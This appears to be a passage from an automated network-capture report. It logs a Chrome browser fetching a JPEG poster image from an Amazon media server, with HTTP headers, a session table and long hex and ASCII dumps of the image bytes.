                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 6f aa 1f 6c d2 f6 2c 44 b5 7b 86 ba 5d a8 0b af da 62 e4 2b 1b 4e a3 ac 07 34 23 6b c8 91 2e 0d dd 72 b6 32 ab 59 ea 12 b0 6a 62 f9 57 39 c1 66 f9 48 66 95 a6 47 c3 3b 99 1f df 70 b5 67 32 10 14 16 ce 0d 90 b2 32 db 86 d2 77 06 f6 5d 78 bc 32 d4 b8 6e de 61 bd 3a 5e 54 94 68 9a f4 b2 2a 9a 53 6f b9 ae b0 35 91 29 79 0d 07 40 26 37 0e f7 6b 05 07 60 19 53 54 e5 d3 49 5a 50 c6 01 f1 2a 6f 6a fc bf 7a cb 0f 0a e8 48 ea f6 95 52 b0 60 ba 37 a2 37 a5 a3 8c 5d ab 6b e8 6a 42 b4 d1 9c 49 3e 3b 78 66 d3 bf 14 46 b2 c8 ad c5 7f aa f4 87 11 e1 b0 b5 49 24 97 9e 4a 85 e8 3a 6c c9 94 6b af 35 96 41 f9 53 d6 36 cd e4 94 5f 87 e8 61 3c 99 32 2c 64 da 61 4a d5 b2 48 82 1e ae bc e0 cc 49 99 31 37 e9 ad 85 b4 24 17 b7 9e a7 a5 30 d8 42 03 b3 af fa f1 44 1f 5a b5 ce f3 87
                                                                                                                                                                                          Data Ascii: ol,D{]b+N4#k.r2YjbW9fHfG;pg22w]x2na:^Th*So5)y@&7k`STIZP*ojzHR`77]kjBI>;xfFI$J:lk5AS6_a<2,daJHI17$0BDZ
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: dc f8 c3 61 3a 9d 3f fd b1 7d 99 d3 5c fe 27 87 d2 fa b9 4b 2b 6d f8 cb a4 a7 1e 49 95 5e 32 52 87 fc 8d 32 e5 a7 34 78 4a 78 13 ca f1 e0 eb 0a 9a ac 5b 39 f4 7d 84 65 36 59 c4 4e a3 8a 2e 1c e2 d6 de 85 67 b3 f8 65 67 92 bc 16 72 81 49 9f 6e 63 4b 69 e5 e4 76 5e 5d f1 21 a3 69 9a 7b 1e 5f e2 62 9f e8 51 b7 31 34 82 77 b7 39 6f c9 6b 37 18 ea 74 ff 00 c9 9a 66 2a a6 da 62 e4 a8 f1 2a c8 57 9b 11 8a 99 7b 04 3b 99 77 f7 08 d6 22 26 55 1d b7 c9 e9 bc 17 6b 62 ea 2f 85 52 5d bc f8 ae 90 fe 26 36 30 c7 4f 36 f5 3a 37 32 ba 80 b3 d7 79 be 98 f5 77 1d 54 e5 f4 e0 ab ca 9a c7 98 58 7f 1c da 30 fa dd 40 b8 79 21 e8 d2 b5 39 1b 22 1a 05 de 42 21 af c4 20 2c 2f ce 22 c2 de e6 e7 3e 52 9a fb 6a 04 27 63 46 dc 70 18 69 99 aa d4 fb d5 13 b8 4e e3 ff 00 52 a2 06 f9 f4
                                                                                                                                                                                          Data Ascii: a:?}\'K+mI^2R24xJx[9}e6YN.gegrIncKiv^]!i{_bQ14w9ok7tf*b*W{;w"&Ukb/R]&60O6:72ywTX0@y!9"B! ,/">Rj'cFpiNR
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 3c 37 6f 86 d6 2a 4c 94 fc 65 98 bc e6 1a 9c 6b 01 17 66 f0 f4 dd 4d e5 19 2c eb c8 d1 7a db eb eb d5 bf f0 ce 9a a0 e3 55 3a 8d 5d aa ea 50 e7 e5 b1 5f 82 cc c9 d3 9d fe 43 35 48 b7 4d 9d 6f dc 71 13 3d 3b d4 86 18 77 76 9c 4b 32 ab af de 6e 57 74 82 d8 d4 76 88 b6 ea dc 58 36 0c b2 ae 13 82 fb 8c 20 59 a9 92 9e 25 af a3 a8 8d 17 23 b6 4c 19 c5 23 de ce 76 cc dc bc c0 40 f3 0c 29 2b a6 59 54 b3 55 6a 58 d7 6f e4 96 6b de 27 53 f3 c2 d8 58 2f be a3 94 b6 ba 85 c1 65 4a 2a 13 a8 e4 8b 8a aa 2d 4b 72 80 ac cd b0 87 12 df b3 af 4d 73 35 ac 5c e3 b5 37 28 aa ea a8 4a 57 8a 66 61 1a 4e d7 b8 75 a9 59 2a 76 94 d2 f9 6d a4 44 15 a8 55 30 cb 6b 13 8c 54 8c b3 20 6d 4c c8 fc a5 66 59 ee 0f 1e 7e 97 b6 80 12 b4 e5 ec 4e 31 04 2b 31 e8 1b 7b 59 ab e6 c4 96 c3 27 d6
                                                                                                                                                                                          Data Ascii: <7o*LekfM,zU:]P_C5HMoq=;wvK2nWtvX6 Y%#L#v@)+YTUjXok'SX/eJ*-KrMs5\7(JWfaNuY*vmDU0kT mLfY~N1+1{Y'
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 07 f3 de d8 e3 31 f1 7b 27 91 cb b3 97 99 ed 83 15 ac da 37 63 d5 42 cc c2 bf c4 6b f8 90 b2 fc 01 6e 9e be c3 a1 f9 63 2e 97 e9 97 9b dc ff 00 5a 66 dd b9 4e 67 2f c8 3f 88 8d fd f5 4e b3 d8 f8 53 75 ed 73 17 78 25 2a 5a 60 d0 3d 1d 81 b4 65 c7 50 3c 55 b6 1a 3e 19 76 b5 bf 88 4e c4 76 df e8 cd c5 39 15 10 25 71 f2 42 cc 7c a6 8d 9a 5a 7d d7 73 d8 68 09 f7 32 33 76 76 18 ec fd 2f cb 3c c3 ce 91 7f 71 08 99 19 69 48 6d d7 6a b2 07 9d 4b aa 7d c3 70 44 b5 78 c4 1b 95 d7 2b f8 4e a7 d4 4e 41 e2 9f 45 ac b4 af 0f 7e e8 a5 50 4a 2f 15 16 12 ab dd fc 0f dc 5f 7d b7 26 39 08 76 47 c6 06 fa 5a 35 19 78 57 e2 a3 cc 03 2d f1 55 b0 ac 2b a1 b9 58 e3 e6 63 aa 2f fb 33 54 71 31 93 b6 37 29 97 64 87 4e 00 61 11 a6 6c 85 d1 fa 57 8a b6 ae 8e 21 e0 ad 2d 57 e1 7a 8b 1e
                                                                                                                                                                                          Data Ascii: 1{'7cBknc.ZfNg/?NSusx%*Z`=eP<U>vNv9%qB|Z}sh23vv/<qiHmjK}pDx+NNAE~PJ/_}&9vGZ5xW-U+Xc/3Tq17)dNalW!-Wz
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: dd c1 e3 e5 2d 5d ca 57 b2 a2 64 8f 99 00 99 53 76 fe 53 b9 f2 e5 2b 5f 06 53 5f 9d 14 c6 50 09 8f 47 63 44 5f ba 4e 9a e5 d9 dc d7 e9 3c 57 d5 79 8c a3 42 b5 37 92 58 f1 f0 22 1e 51 6b ed f9 96 e9 c3 47 b0 81 2b b8 31 20 8f 50 c1 09 9d 43 a8 05 dd 60 1d e8 17 c6 fe 7e 98 99 1d 86 99 38 bf 71 f3 af 89 ac fc d5 39 10 a6 d5 4e 40 b0 f9 07 21 8f 2f 94 1e 66 e2 57 c8 c4 4b 2a 89 63 7a 98 f7 7c 7c dc bd df 31 d9 80 f3 f0 6d cb 28 1f c5 94 f1 fa 1f a2 d7 e3 71 3c 7a e5 a8 d7 8f 4b 83 c7 c9 9c ce 4b 05 87 e0 58 9b 2c 2e de 31 07 71 b5 37 1a 79 13 a8 e7 1a fe 0a 89 c8 13 f4 a5 bc 6a 36 20 d7 39 5b 70 95 06 6e db 0b d3 95 d5 57 12 8a 9d 4f 0b ee 1a fd e6 ce 7f 43 ee 27 7e 73 46 f6 b8 81 87 2a 8d d6 d3 e0 e0 e4 2e fe 4f 5a 30 f3 5d 7b 78 6e 2b 39 ab fb ec 29 f5 7d
                                                                                                                                                                                          Data Ascii: -]WdSvS+_S_PGcD_N<WyB7X"QkG+1 PC`~8q9N@!/fWK*cz||1m(q<zKKX,.1q7yj6 9[pnWOC'~sF*.OZ0]{xn+9)}
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 52 5c ab 2f 6d 03 49 31 c2 c5 aa 85 1e 44 5e 8c dc 7c 37 51 e9 34 df 47 2c 68 5a 06 84 c6 e4 31 94 a7 66 59 de 43 96 c1 34 b1 16 20 01 f4 c8 7b 35 8e 96 49 6d e4 31 57 e4 3b 7b 11 15 19 a8 6c 96 e6 00 0d d4 2e 99 89 e3 b5 73 8c 7c 1d cc 54 b6 c8 82 ad 78 f9 2e 64 09 1d d7 d2 8c cb 98 3f e3 cd 09 2a e9 76 6b 92 fa a1 d4 98 22 5b a1 fb 31 9d 0d 14 c9 a8 b8 e9 25 e9 2c f8 44 84 87 75 ab be 06 2b 85 66 0d 6d 22 12 af 6b c4 4f 3b 54 1c 7a 41 16 6a 77 69 d9 a7 5c 9d 76 48 21 db 2e 42 55 a7 31 25 9b 12 90 f3 70 4b 08 98 8e 5e d5 aa db 9a 49 46 2a ed 63 7c 92 09 f4 a6 26 3d 52 6d 1f ed c5 dc 91 13 46 e2 5a 49 cd 7e 56 28 dd a9 f6 97 ab 57 32 f9 6d a5 44 86 79 21 62 84 22 91 90 10 0f 56 f1 2c b3 a4 6e df 4d 5a a2 b4 86 49 b7 a1 3a d2 4a c8 c1 94 4a cf 96 7f 22 81
                                                                                                                                                                                          Data Ascii: R\/mI1D^|7Q4G,hZ1fYC4 {5Im1W;{l.s|Tx.d?*vk"[1%,Du+fm"kO;TzAjwi\vH!.BU1%pK^IF*c|&=RmFZI~V(W2mDy!b"V,nMZI:JJ"
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 3d f8 be 60 57 14 fb 2b c6 53 e0 b9 17 2e 04 4c 64 f2 2a 61 4e aa 18 54 90 84 cb 04 93 03 7a b5 d8 bb bb 32 ec 30 66 91 54 6a b1 41 21 62 cd 72 b8 c1 78 39 15 c6 ac b2 2b 0c 8c d1 3b fb 5b 55 db b3 09 32 b2 84 b1 2a 09 36 16 4b e2 dd 5a 75 8d 48 7b ab f3 3c 84 d3 c9 e5 1a d0 73 82 ae 24 06 3c 30 55 7c 63 c1 18 18 06 34 15 24 a2 33 fe 8b 34 2c 70 b7 9a 8d 55 91 0b 02 63 82 76 50 41 5b 9c fb 0a 29 53 3d d0 84 7f 0a 95 ee 91 b6 18 a9 67 79 65 24 78 c6 7b 75 52 31 46 3c 8c 51 40 0d 1c 81 f1 76 93 6a d5 eb c4 c4 60 47 01 0d dc a4 17 a8 df 39 06 df 56 25 49 b5 c1 a6 55 23 01 62 0b 9c 04 14 63 2e 72 f2 78 c1 24 8b a4 27 14 d3 83 82 a9 38 39 04 26 c3 e3 d6 d8 a6 01 49 34 0a 03 46 68 81 c5 79 92 9a 45 d0 e1 61 d8 d0 1a 93 48 4a 9c ab 6f 9c d7 aa 5b 42 40 34 96 4a
                                                                                                                                                                                          Data Ascii: =`W+S.Ld*aNTz20fTjA!brx9+;[U2*6KZuH{<s$<0U|c4$34,pUcvPA[)S=gye$x{uR1F<Q@vj`G9V%IU#bc.rx$'89&I4FhyEaHJo[B@4J
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ff 00 d5 b6 e4 2c ea 45 41 c6 d6 69 62 91 d2 c2 3c 44 62 f1 ee 06 91 a8 49 f2 d3 32 97 62 59 93 2a 38 68 23 01 e2 52 76 ae 8c a4 64 2f f2 a6 3a 29 09 77 0b 5c 6b dd ea c3 c0 58 33 e5 2e 53 c6 7c 72 09 91 fe 18 c6 be da 6b c4 ae 97 90 67 32 02 20 e5 ed 56 56 58 8f d4 36 24 3f ed 5f a9 a7 d1 d3 fd 53 65 80 eb 25 b9 65 62 cc b1 39 f6 dc 5d bf c3 c2 52 e0 3a d4 93 33 38 cf bc 8e 31 ee 4e 40 c8 c1 40 b0 aa 74 f2 db 33 29 0f 2d 12 fd 55 21 e2 42 12 5c 44 a3 1a af 73 96 49 0d d4 59 76 32 10 4a 33 7c 25 39 24 20 0a 9f 4f 05 3d a6 9f 82 40 a5 a2 96 2e 87 45 1b d6 cc 77 8c 64 3a d6 e7 e1 7d 6d b9 19 1f 5a 62 49 d9 2d a1 bc 5b 88 75 e6 55 0b 9d c0 39 db f2 f5 0f 14 d3 a9 6c 2f af 58 f2 41 1e c1 1c 62 cd 2b 30 8f 86 0b f0 9c 78 56 04 04 c6 d0 07 77 66 ff 00 69 d0 94
                                                                                                                                                                                          Data Ascii: ,EAib<DbI2bY*8h#Rvd/:)w\kX3.S|rkg2 VVX6$?_Se%eb9]R:381N@@t3)-U!B\DsIYv2J3|%9$ O=@.Ewd:}mZbI-[uU9l/XAb+0xVwfi


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          142192.168.2.1649885151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:18 UTC676OUTGET /images/M/MV5BMDU2ZWJlMjktMTRhMy00ZTA5LWEzNDgtYmNmZTEwZTViZWJkXkEyXkFqcGdeQXVyNDQ2OTk4MzI@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:18 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 38682
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: f75e3baa-0846-4661-aede-5423ffceca82
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sun, 20 Dec 2015 02:26:17 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 12 Nov 2044 03:35:56 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1552265
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:18 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000173-IAD, cache-nyc-kteb1890081-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c0 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 06 07 04 05 02 03 08 01 00 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 02 03 06 01 00 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 5f 40 b6 89 ad c4 8e 8e 1a 0d 06 d6
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6_@
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: f4 6f a4 7c 5d 11 f4 cb c3 b2 d3 e4 8c 79 38 fb fe db ee 97 d1 5e cb 1a 91 b5 03 a7 46 61 f2 04 f9 b2 17 7e 82 9e 1d 6e 61 b1 d7 8e 51 87 2e fa c0 78 9b 47 8a 26 72 f3 db 35 53 26 39 1e 5a 12 91 0d 62 cd 28 62 0a 44 43 a4 cc 2e e7 03 98 11 04 53 53 11 8e 88 ac 26 f2 cc c7 f6 2e 14 ac 0b a5 65 1f 4f 2b fa c2 00 d5 23 d5 96 7f 5f 4e 9c 37 e3 e9 e1 ab 7e 3c b3 4e 73 e3 46 45 12 b4 ca b1 7d 32 f6 45 5e 3b e9 91 61 46 c8 53 a6 63 0e be 50 b2 89 4f e5 a2 99 97 d2 1c 3b cc 55 f4 22 b1 ff 00 9f 7d 7b 1c 66 8c 3a 58 64 0b 9a f6 55 b7 a9 f9 e9 58 55 0c ee 76 e9 ab ae cb 8e cc 4b b6 79 75 a1 52 56 00 85 76 41 4f 28 b5 f8 c1 d4 9f f6 ea e0 f9 db cb da ad 5e 5a 2e 12 b5 cb da 4b 85 cc 56 b5 8d 1a c6 3a 07 eb 56 a7 30 15 99 54 c1 ad 3a 81 6f ee ac 9f 11 8a 63 a2 da da
                                                                                                                                                                                          Data Ascii: o|]y8^Fa~naQ.xG&r5S&9Zb(bDC.SS&.eO+#_N7~<NsFE}2E^;aFScPO;U"}{f:XdUXUvKyuRVvAO(^Z.KV:V0T:oc
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 00 a8 50 a3 d0 cb 2a e7 74 b0 6d 2d 7d 62 71 9b 46 32 c8 06 45 4d 04 a0 d9 d9 4d 06 c9 82 6a 73 3a 23 8e 80 4f b6 db d0 af 1a 89 94 06 7e b6 d7 51 94 f9 27 7e 98 3d f0 98 a4 5d 03 17 d4 92 76 40 f4 4a ca 57 45 d4 5a 42 74 85 66 57 c4 3f 3b 17 0a 9c 1b 7e e0 f0 30 37 aa 12 52 11 52 56 c3 2d a0 c2 06 75 cd 3a d3 7a e2 15 b2 00 b4 92 3b a1 68 31 3e 54 1b 9d 2a 8d 49 0a a8 41 d3 68 b9 9a 54 4a fa 9c e1 ad a5 6b b8 f2 be 81 36 e6 9e 92 c5 df 50 81 e9 a5 7b 1e aa f2 ce 26 bb 9a 36 43 fa 7d 51 61 e7 b4 fb ac 37 a5 1b b1 9c 82 45 c6 50 93 03 9f ab 84 fb d2 87 8a 23 47 6e e9 38 ea 78 4b 5a 9b 2d 1b 0b 66 68 23 58 d3 4b e5 c4 96 7a 40 01 67 64 35 26 2d e2 fb 84 fb 09 d1 31 e8 91 6b 88 43 32 18 4d 2a f6 0c 0e 7b b8 57 b1 59 67 5d 94 d6 2a ae 0e 53 53 29 ad c5 67 cf
                                                                                                                                                                                          Data Ascii: P*tm-}bqF2EMMjs:#O~Q'~=]v@JWEZBtfW?;~07RRV-u:z;h1>T*IAhTJk6P{&6C}Qa7EP#Gn8xKZ-fh#XKz@gd5&-1kC2M*{WYg]*SS)g
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: a5 6a 43 2d a0 f9 0d 60 b7 da b5 59 65 59 0b 4a 75 ba f6 dd c1 4d ef 57 e2 99 25 db 94 0e 51 d8 ae 47 59 39 34 da ab 50 fd 4a aa 1a f2 eb ef 69 a9 95 d4 5f b2 54 fd b5 a1 73 a0 f5 94 f5 2b c7 c7 dd f2 04 61 3a 51 1d ed 16 b0 d5 fc 63 26 9d d7 52 42 fb f0 04 13 aa 53 da b5 8c c2 a8 35 9c 8a 62 0b 2f 17 0b ac 06 d4 9b 69 9c 9c aa b0 4d cc 2f 71 e3 29 4f 02 56 83 76 4e 26 96 e2 53 23 c4 5d d8 4e 8b 05 f9 c8 bb b8 7d 70 50 2d 63 62 09 40 08 bb 36 b2 91 eb 94 34 e7 ee ff 00 91 86 e6 20 3d c0 46 f8 25 b6 4c f3 c3 42 24 5f 4e ae 9c aa 53 30 d0 1f 74 45 5f 93 98 fe fa b4 ec 34 c4 71 76 1e 4a c4 7e 3e 66 05 47 6d 10 fb 9c c2 a1 fc 1e cd 62 64 e4 70 1e 81 4b 7c 2e 39 fd ad 2a 20 62 20 f4 1f 66 68 fc 4f da 0e a6 3e 35 d9 3f e3 cb e9 7f 49 4f 3b 30 94 70 dc c8 ff 00
                                                                                                                                                                                          Data Ascii: jC-`YeYJuMW%QGY94PJi_Ts+a:Qc&RBS5b/iM/q)OVvN&S#]N}pP-cb@64 =F%LB$_NS0tE_4qvJ~>fGmbdpK|.9* b fhO>5?IO;0p
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 22 e5 ea 55 97 bf 32 8c cf 8d e4 7f 35 c6 1c 6f 1b 97 57 db 6d 7d b5 fb 94 42 df f3 52 8c cf d3 6b f7 32 1b 56 59 09 f4 26 57 41 b4 f1 4c 5e 88 a9 e6 ee ca 8f 03 a8 60 76 cf 35 c7 7d fb 4d 43 5e 66 39 f7 cf a9 3f 13 20 f9 86 d6 df 87 b5 ac fc a5 c7 4b 30 71 bc 6c 89 95 6f 05 96 bf 6c 43 cc 9f 71 c3 53 3e 89 67 d2 2c fa 66 ff 00 4c 3b 77 f3 dd f1 32 d0 9e 36 7a f6 5a 54 9a 3e e6 72 60 3a 9b 82 53 90 6b f1 09 df a0 f3 30 f1 86 bd b8 a4 e8 83 95 98 b8 da e4 3a 90 7f c5 d7 bc 84 15 25 6d 1b 98 db de e6 3a 0b 9f 47 a8 22 ab 0e 3e bc 0b 5d 28 5d 08 66 4d 9d c6 99 3f 35 19 69 d7 08 1b 97 9f 4e 31 56 30 43 e6 ce ca 7e af aa c7 1e e6 03 f5 01 33 b8 67 72 73 1f 76 22 07 b5 54 d4 9b f0 19 82 37 19 f3 a9 d4 bb 8b 49 ed 74 db df 27 1f 95 9d 4f 1f 8d e1 c0 f3 28 7e 26
                                                                                                                                                                                          Data Ascii: "U25oWm}BRk2VY&WAL^`v5}MC^f9? K0qlolCqS>g,fL;w26zZT>r`:Sk0:%m:G">](]fM?5iN1V0C~3grsv"T7It'O(~&
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: cc 6e a7 c4 0a b2 93 ff 00 1c 92 4f bc cb 31 6b b8 ae c6 5d 2a 34 b7 3a 8f e3 4a 7f 84 9d f3 0d 3b 7c a5 98 e3 fd 6b 41 1d b4 ad e9 45 88 ea 38 67 0b bb 2c 26 2e 52 de 3d b9 b9 2b 52 95 6c 1a 85 75 2e ab 6e e0 f7 62 56 2a ca b1 43 6f c6 ba a1 02 a9 83 97 f5 0b a6 c8 bd 71 2b f0 5c 96 e4 5b d5 98 cd fa 28 8b 59 69 4f 4d 75 f2 2d e9 fb 4d ca d0 87 01 95 46 ce f2 7c bb 19 4d da f2 bf d5 91 57 df dc 5b 02 ba bb f2 f7 28 5e e8 99 78 4a a3 63 91 53 05 9b 82 c6 80 c0 d2 c6 f6 9f 41 d4 68 3a 27 27 a9 87 52 a9 81 96 b8 fc b9 67 e5 2e 41 5e 38 9d 47 b2 38 3d 9d 5d 75 ec c4 ca ed d8 6c 7c 8e a2 af db 2b 7f 51 aa d4 65 98 19 2b 8e cc 5b 3f 31 32 02 f1 87 f5 eb b0 21 3b 98 e5 48 e2 1d 39 1d 4a 4e b8 99 86 2c 72 bc f8 4c bc 7f e5 d9 72 42 31 f4 ba 21 29 e5 53 32 c2 de
                                                                                                                                                                                          Data Ascii: nO1k]*4:J;|kAE8g,&.R=+Rlu.nbV*Coq+\[(YiOMu-MF|MW[(^xJcSAh:''Rg.A^8G8=]ul|+Qe+[?12!;H9JN,rLrB1!)S2
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 5c 89 f5 11 b2 75 f2 f9 8a 9f 17 5e d7 1d 95 68 cb b9 e5 60 78 ed f1 29 68 b6 f1 65 69 fd 56 ab 3e 5d 71 c9 f3 68 a9 4f 88 a9 b8 04 d4 27 f8 bd 0c 0a 4c 2f da da 2b 82 7c 44 0a a3 cd 73 ba 42 b4 5f fe f6 e5 37 76 b7 c6 d7 e4 77 e8 c7 73 53 53 07 1f ea 76 a7 a8 63 a6 38 a4 20 32 cb f4 3c 35 91 be 7d 29 3a 3e 87 cc 61 a8 62 c7 7f d1 09 ff 00 af 06 9d a3 2a c2 d8 d9 c3 03 64 45 59 90 bc 5d a5 86 71 2d 1a bf fb a9 66 43 3e a7 7d b5 a6 a3 1d 6e 70 0e 75 63 1c f8 15 73 d4 34 7f ec dc 7f 5b 88 8c df 07 15 d5 79 7a 22 97 3a 18 f8 eb 5c ba 97 ad cd b4 e7 db 63 15 0e c7 db e1 db 50 b7 a0 31 66 fd 2b a0 de 78 8c dc 53 88 e1 0a 44 5a 42 20 6c 8c 64 42 bd ad 30 9c a0 d2 fc a5 8a 1e 77 e5 cc 79 4d 4a fc 11 be c0 97 d2 88 37 0c 3e 44 a5 a6 46 47 32 a1 8b 05 1b 96 5f b1
                                                                                                                                                                                          Data Ascii: \u^h`x)heiV>]qhO'L/+|DsB_7vwsSSvc8 2<5}):>ab*dEY]q-fC>}npucs4[yz":\cP1f+xSDZB ldB0wyMJ7>DFG2_
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: af b0 a2 0f 8a fa 9d 8b fc 5f f0 c8 8d dd 9e b8 e7 e4 56 da 09 15 d6 39 d6 44 57 5c d9 4a cb 5f 85 04 8f ea 1f 23 b1 11 55 91 cf b2 47 93 19 82 8e 71 ec 3b 7f 14 5f 6c 0d dc c0 1a cd 43 19 9d 2c 36 c5 aa c3 47 41 04 94 e1 13 c7 02 46 38 4b d6 8b cc 40 a7 4f df 30 07 69 6e 65 62 88 92 12 a3 a8 76 c2 e3 8c d6 5e 96 45 f5 34 a2 62 07 a6 d6 ba e4 af ec 66 a7 32 7f d1 5c 03 24 83 bc a8 0c a8 22 23 2c 4d 13 46 7a ea 2e 92 ab 19 dd 46 91 6c e5 64 d5 00 ba ea e4 4b bb 90 f6 54 24 9c d6 d7 eb 13 49 97 a2 92 62 7b 7e 2b d6 e4 bc 20 4e e2 38 cf 8e 29 50 04 71 7a d1 57 f7 39 c6 05 cb 3d b9 04 11 ec 24 b2 b9 45 2b 94 6c 3a b3 98 f7 16 05 8b ae f1 ea 6c 19 b5 8a 04 92 34 72 31 73 b0 84 65 4a cc 20 8d 56 5a 64 a1 12 5f d9 8a 0e d1 e6 96 9f 14 92 d1 8e 1e ec 17 17 c9 35
                                                                                                                                                                                          Data Ascii: _V9DW\J_#UGq;_lC,6GAF8K@O0inebv^E4bf2\$"#,MFz.FldKT$Ib{~+ N8)PqzW9=$E+l:l4r1seJ VZd_5
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 20 26 08 a3 89 a6 56 cc 71 88 0c 60 ba fa e9 ce 8e 3a 68 62 a6 be b4 f5 8b b1 fd 96 21 4f c6 21 d7 80 d8 6a 84 a9 5a 6b 19 dd a8 ab 31 36 67 13 2e 4a b1 53 df 51 ba ab 7e 47 73 9a 70 01 cc 93 50 16 fb f1 51 c1 c7 c9 81 a8 12 ac 4b 4b bd 0d 70 89 3a f2 e0 f2 75 47 5e cd d3 c8 74 68 75 b5 c5 e7 8e 3b b0 e3 5b 91 03 24 91 48 b4 9c a3 ed fb b7 d3 af 97 52 dc da e7 ec 86 76 62 59 b5 4c 77 9f 5e c7 44 e9 b7 09 06 f5 8c 81 80 a9 72 a5 4a b1 d8 50 f3 d6 bb 35 a6 39 53 ad ab 68 4b 96 b5 77 6d b2 49 35 ac b0 77 db 72 90 3f bf 7a dc ef e5 cc 73 ad e3 3b 1b 2b 24 5f 1c 0d 6d b7 e4 3c f4 b2 67 60 aa 47 07 83 7c e3 7e bc 93 fd 16 4c e4 2a ce 4b 05 03 53 50 c7 49 b7 64 f5 d5 a0 c0 f2 b9 78 6b 45 36 9e ce ae b8 a7 b3 30 03 93 8b 81 19 76 69 f8 cb 1e aa 76 8b de ce c7 5c
                                                                                                                                                                                          Data Ascii: &Vq`:hb!O!jZk16g.JSQ~GspPQKKp:uG^thu;[$HRvbYLw^DrJP59ShKwmI5wr?zs;+$_m<g`G|~L*KSPIdxkE60viv\
